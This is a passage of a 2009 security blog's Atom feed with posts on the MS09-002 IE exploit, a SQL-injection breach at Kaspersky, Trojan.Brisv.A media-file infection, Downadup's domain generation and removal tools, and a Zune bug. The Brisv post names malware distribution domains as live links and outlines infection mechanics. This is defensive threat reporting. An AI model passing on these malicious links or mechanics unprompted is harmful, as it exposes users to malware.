src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-3932996753208014591</id><published>2009-02-17T07:29:00.001-08:00</published><updated>2009-02-17T07:30:57.132-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ms09-002 exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='HTML_DLOADER.AS'/><category scheme='http://www.blogger.com/atom/ns#' term='ms09-002'/><category scheme='http://www.blogger.com/atom/ns#' term='IE 7 Bug'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploitation of MS09-002'/><category scheme='http://www.blogger.com/atom/ns#' term='CVE-2009-0075'/><title type='text'>Exploitation of MS09-002</title><content type='html'>Today&amp;nbsp; Trend Micro reported a exploit related to the vulnerability of&amp;nbsp; Microsoft Security Bulletin MS09-002. (CVE-2009-0075).&lt;br&gt;&lt;br&gt;Successful exploits allow attackers to execute arbitrary code in the context of the user running Internet Explorer.&lt;br&gt; &lt;br&gt;Till now exploitation of this issue is limited to targeted attacks. The exploit is delivered by a&amp;nbsp; malicious .doc file to a user. When the user opens a file, an ActiveX control included in the file tries to download and open a malicious HTML file that is apecifically designed to exploit this issue. And on&amp;nbsp; successful exploitation, a backdoor is installed on the vulnerable computer. The malicious code then is used to steal information from the exploited computer and sends it to a remote computer over TCP port 443.&lt;br&gt; &lt;br&gt;Till now i have only this much Info, when i will get more will update you.&lt;br&gt;&lt;br&gt;Remedy:&lt;br&gt;Cumulative Security Update for Internet Explorer (961260)&lt;br&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx"&gt;http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx&lt;/a&gt;&lt;br&gt; &lt;br&gt;Reference&lt;br&gt;Patch Microsoft Internet Explorer Uninitialized Memory Remote Code Execution Vulnerability&lt;br&gt;&lt;br&gt;&lt;a href="http://www.securityfocus.com/bid/33627"&gt;http://www.securityfocus.com/bid/33627&lt;/a&gt;&lt;br&gt;&lt;a href="http://blog.trendmicro.com/another-exploit-targets-ie7-bug/"&gt;http://blog.trendmicro.com/another-exploit-targets-ie7-bug/&lt;/a&gt;&lt;br clear="all"&gt; &lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-3932996753208014591?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/3932996753208014591/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=3932996753208014591' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3932996753208014591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/3932996753208014591'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/02/exploitation-of-ms09-002.html' title='Exploitation of MS09-002'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-6813937190634208519</id><published>2009-02-15T23:53:00.000-08:00</published><updated>2009-02-15T23:54:02.592-08:00</updated><title type='text'>Kaspersky Hacked by SQL injection</title><content type='html'>&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///D:%5CDOCUME%7E1%5Cchandad%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;style&gt; &amp;lt;!--  /* Font Definitions */  @font-face 	{font-family:&amp;quot;Cambria Math&amp;quot;; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 159 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:&amp;quot;&amp;quot;; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} a:link, span.MsoHyperlink 	{mso-style-priority:99; 	color:blue; 	mso-themecolor:hyperlink; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{mso-style-noshow:yes; 	mso-style-priority:99; 	color:purple; 	mso-themecolor:followedhyperlink; 	text-decoration:underline; 	text-underline:single;} p.MsoListParagraph, li.MsoListParagraph, div.MsoListParagraph 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpFirst, li.MsoListParagraphCxSpFirst, div.MsoListParagraphCxSpFirst 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpMiddle, li.MsoListParagraphCxSpMiddle, div.MsoListParagraphCxSpMiddle 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:0in; 	margin-left:.5in; 	margin-bottom:.0001pt; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} p.MsoListParagraphCxSpLast, li.MsoListParagraphCxSpLast, div.MsoListParagraphCxSpLast 	{mso-style-priority:34; 	mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-type:export-only; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:.5in; 	mso-add-space:auto; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:&amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:Calibri; 	mso-fareast-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&amp;gt; &lt;/style&gt;  &lt;p class="MsoListParagraphCxSpFirst" style="text-align: justify;"&gt;Hi readers, though it's an week old event still I thought to put it across what exactly has happened with two Antivirus vendors, Kaspersky (&lt;a href="http://usa.kaspersky.com"&gt;usa.kaspersky.com&lt;/a&gt;) and BitDefender.&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;Someone (a hacker) hacked into their database and released 40,000 + customer information,&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;He just did it over a SQL injection on their websites. He named himself as &lt;a href="http://hackersblog.org/2009/02/07/usakasperskycom-hacked-full-database-acces-sql-injection/"&gt;UNU&lt;/a&gt; in HaskersBlog.org, have a look. &lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;Some info more on this are at below mentioned URLs.&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;&lt;a href="http://technicalinfodotnet.blogspot.com/2009/02/kaspersky-usa-portal-sql-injection.html"&gt;http://technicalinfodotnet.blogspot.com/2009/02/kaspersky-usa-portal-sql-injection.html&lt;/a&gt;&lt;/p&gt;   &lt;p class="MsoListParagraphCxSpMiddle" style="text-align: justify;"&gt;&lt;a href="http://www.darkreading.com/security/attacks/showArticle.jhtml;jsessionid=BE4VOR3YATACEQSNDLPSKH0CJUNN2JVN?articleID=213401799"&gt;http://www.darkreading.com/security/attacks/showArticle.jhtml;jsessionid=BE4VOR3YATACEQSNDLPSKH0CJUNN2JVN?articleID=213401799&lt;/a&gt;&lt;/p&gt;   &lt;p class="MsoListParagraphCxSpLast" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;   &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-6813937190634208519?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/6813937190634208519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=6813937190634208519' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6813937190634208519'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6813937190634208519'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/02/kaspersky-hacked-by-sql-injection.html' title='Kaspersky Hacked by SQL injection'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-2862888883304672316</id><published>2009-02-13T05:29:00.001-08:00</published><updated>2009-02-13T12:25:02.738-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ASF File Infection'/><category scheme='http://www.blogger.com/atom/ns#' term='URLANDEXIT'/><category scheme='http://www.blogger.com/atom/ns#' term='Trojan.Brisv.A removal tool'/><category scheme='http://www.blogger.com/atom/ns#' term='Trojan.Brisv.A'/><category scheme='http://www.blogger.com/atom/ns#' term='Trojan.Brisv.A URLANDEXIT'/><category scheme='http://www.blogger.com/atom/ns#' term='How is the trojan.Brisv.A spread'/><title type='text'>Trojan.Brisv.A Infection toll again</title><content type='html'>There is one old trojan which is again started taking its toll, that is named as Trihan.Brisv.A by Symantec, though it was discovered on July last year, this is also known as W32/GetCodec-A by Sophos. Well how is this delivered is very simple, its basically delivered by the P2P and/or warez sires, when someone is looking for some cracks or keygens, so while downloading those, all what they get is the trojan infected files, and once activated by trying to open those files, they eventually infect all the media files on the victims system, such as ASF, WMV, WMA, MP2, MP3.&lt;br&gt; &lt;br&gt;And when these media files are accessed they trigget a connection to malicious links from where it receives an encrypted file with more malicious URLs to download various malware files. This trojan basically injects a script command in the media file header. This script command in this case is &amp;quot;URLANDEXIT&amp;quot;, which is followed by a URL ( in this case a malicious URL ), which will be opened with the default browser of the victim system when playing the media file.&lt;br&gt; &lt;br&gt;As i have seen in different information sources, that this is now going to hxxp://&lt;a href="http://isvbr.net"&gt;isvbr.net&lt;/a&gt; where it gets a 302 redirect command to go to a website named hxxp://&lt;a href="http://www.play-error.com"&gt;www.play-error.com&lt;/a&gt;, which is allowing the user to download a reg file to fix the problem of media file not being able to open and play. This site is also delivering multiple payloads and other malwares.&lt;br&gt; &lt;br&gt;You can use the following tool to see if there is any script command being embeded in the infected media files or you have a file which is downloaded from internet and you are not able to play it.&lt;br&gt;&lt;br&gt;&lt;a href="http://handlers.sans.org/bzdrnja/findasfcommands.zip"&gt;http://handlers.sans.org/bzdrnja/findasfcommands.zip&lt;/a&gt;&lt;br&gt; &lt;br&gt;How to use it : &lt;a href="http://isc.sans.org/diary.html?storyid=4664"&gt;http://isc.sans.org/diary.html?storyid=4664&lt;/a&gt;&lt;br&gt;&lt;br&gt;More detailed analysis is given here&lt;br&gt;&lt;br&gt;&lt;a href="http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.isvbr.net&amp;amp;x=0&amp;amp;y=0"&gt;http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.isvbr.net&amp;amp;x=0&amp;amp;y=0&lt;/a&gt;&lt;br&gt; &lt;a href="http://blog.threatexpert.com/2009/02/trojan-getcodecbrisv-comes-back-again.html"&gt;http://blog.threatexpert.com/2009/02/trojan-getcodecbrisv-comes-back-again.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;Removal Instruction:&lt;br&gt;&lt;a href="http://www.symantec.com/security_response/writeup.jsp?docid=2008-071823-1655-99&amp;amp;tabid=3"&gt;http://www.symantec.com/security_response/writeup.jsp?docid=2008-071823-1655-99&amp;amp;tabid=3&lt;/a&gt;&lt;br&gt; &lt;br&gt;Removal Tool:&lt;br&gt;&lt;a href="http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixBrisvA.exe"&gt;http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixBrisvA.exe&lt;/a&gt;&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-2862888883304672316?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/2862888883304672316/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=2862888883304672316' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2862888883304672316'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2862888883304672316'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/02/trojanbrisva-infection-toll-again.html' title='Trojan.Brisv.A Infection toll again'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-2179158826482147751</id><published>2009-02-05T05:59:00.001-08:00</published><updated>2009-02-05T06:05:30.599-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B microsoft removal tools'/><title type='text'>W32.Downadup Removal Tool</title><content type='html'>For those who are still looking for the removal tool for Downadup, there is something from Symantec&lt;br&gt;have a look.&lt;br&gt;&lt;br&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-011316-0247-99"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-011316-0247-99&lt;/a&gt;&lt;br&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-2179158826482147751?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/2179158826482147751/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=2179158826482147751' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2179158826482147751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/2179158826482147751'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/02/w32downadup-removal-tool.html' title='W32.Downadup Removal Tool'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5659297702413135504</id><published>2009-01-22T11:48:00.001-08:00</published><updated>2009-01-22T11:51:39.698-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Botnet DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets and DNS'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>Botnet and DNS</title><content type='html'>Some good article is posted here in relation to Botnet and DNS relations, have a look.&lt;br&gt;&lt;a href="http://wormsandexploits.blogspot.com/2008/11/relation-between-botnet-and-dns.htmlhttp://wormsandexploits.blogspot.com/2008/11/how-bots-are-spread_3465.htmlhttp://wormsandexploits.blogspot.com/2008/11/botnets-vs-botnets.htmlhttp://wormsandexploits.blogspot.com/2008/11/cell-phone-botnetsthe-newest-threat-in.html"&gt;&lt;br&gt; http://wormsandexploits.blogspot.com/2008/11/relation-between-botnet-and-dns.html&lt;br&gt;http://wormsandexploits.blogspot.com/2008/11/how-bots-are-spread_3465.html&lt;br&gt;http://wormsandexploits.blogspot.com/2008/11/botnets-vs-botnets.html&lt;br&gt; http://wormsandexploits.blogspot.com/2008/11/cell-phone-botnetsthe-newest-threat-in.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5659297702413135504?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5659297702413135504/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5659297702413135504' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5659297702413135504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5659297702413135504'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/botnet-and-dns.html' title='Botnet and DNS'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-5591276893786387170</id><published>2009-01-07T05:41:00.000-08:00</published><updated>2009-01-07T05:44:19.586-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Remote Memory Corruption Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='Removal tool for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='security updates for w32.downadup.b'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08067 virus'/><category scheme='http://www.blogger.com/atom/ns#' term='removal tool virus W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Conficker'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='ms exploit 08067'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.B + removal tools'/><category scheme='http://www.blogger.com/atom/ns#' term='W32/Confick-A'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='MS 08-067'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.B'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup Bot'/><category scheme='http://www.blogger.com/atom/ns#' term='w32.downadup and Botnet'/><title type='text'>W32.Downadup Infection Pattern</title><content type='html'>Today let me tell you something about the update mechanism of the latest worm w32.Downdup and w32.Downdup.B. Once the host is infected it generates approx 250 random domain addresses and these addresses are unique to a given day and date, this is done in a view to contact those domain in a latter stage to get the updated files. So the question is why the malicious code writers are using this technique, well this is done in a view to keep the security companies to blacklist the domain used by the code writers for the malicious activities, as the domains will not be known until the day reaches and gets generated by the worm, and moreover the author of the worm may pre-choose a given date and a domain of his choice from the list of domains to be generated for that day. &lt;br&gt; &lt;br&gt;For more details visit the full research by Symantec.&lt;br&gt;&lt;br&gt;&lt;a href="https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/224"&gt;https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/224&lt;/a&gt;&lt;br&gt; &lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-5591276893786387170?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/5591276893786387170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=5591276893786387170' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5591276893786387170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/5591276893786387170'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/01/w32downadup-infection-pattern.html' title='W32.Downadup Infection Pattern'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-1517521855677745722</id><published>2009-01-05T06:13:00.000-08:00</published><updated>2009-01-05T06:14:04.629-08:00</updated><title type='text'>Zune Player Bug and Fix</title><content type='html'>&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CDEEPAY%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;style&gt; &amp;lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:&amp;quot;&amp;quot;; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:&amp;quot;Times New Roman&amp;quot;; 	mso-fareast-font-family:&amp;quot;Times New Roman&amp;quot;;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:1322584543; 	mso-list-type:hybrid; 	mso-list-template-ids:-1163907420 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l0:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l1 	{mso-list-id:1440368704; 	mso-list-type:hybrid; 	mso-list-template-ids:1682623662 -1236995858 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l1:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l2 	{mso-list-id:1522475741; 	mso-list-type:hybrid; 	mso-list-template-ids:1608007816 -1236995858 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;} @list l2:level1 	{mso-level-tab-stop:.5in; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --&amp;gt; &lt;/style&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;There is another big flaw from Microsoft on its competitor MP3 player to iPod, ZUNE is having a bug. This bug came to picture on 31&lt;sup&gt;st&lt;/sup&gt; Dec 2008 night during midnight. This issue came up in 2006 model Zune 30GB devices. Actually Zune could not handle that 2008 had 366 days, instead of the 365, so the beautiful gadgets broke down. On January 1 2009, the software automatically checks its internal clock again and would have got past the missing day. This is basically a bug in the internal clock driver and the way the device handles a leap year. But Microsoft is quick to give the fix and claims that this will not be re occurred in the next Leap year in 2012.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&amp;nbsp;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;There is a fix o got while surfing through the different forums. Here is the Fix.&lt;/p&gt;  &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;strong&gt;To Fix Your Zune Follow These Steps:&lt;/strong&gt; &lt;/p&gt;  &lt;p style="margin: 0in 0in 0.0001pt 0.5in; text-indent: -0.25in;"&gt;&lt;span style=""&gt;1.&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;Disconnect your Zune from USB and AC power sources.&lt;/p&gt;  &lt;p style="margin: 0in 0in 0.0001pt 0.5in; text-indent: -0.25in;"&gt;&lt;span style=""&gt;2.&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;Because the player is frozen, its battery will drain-this is good. Wait until the battery is empty and 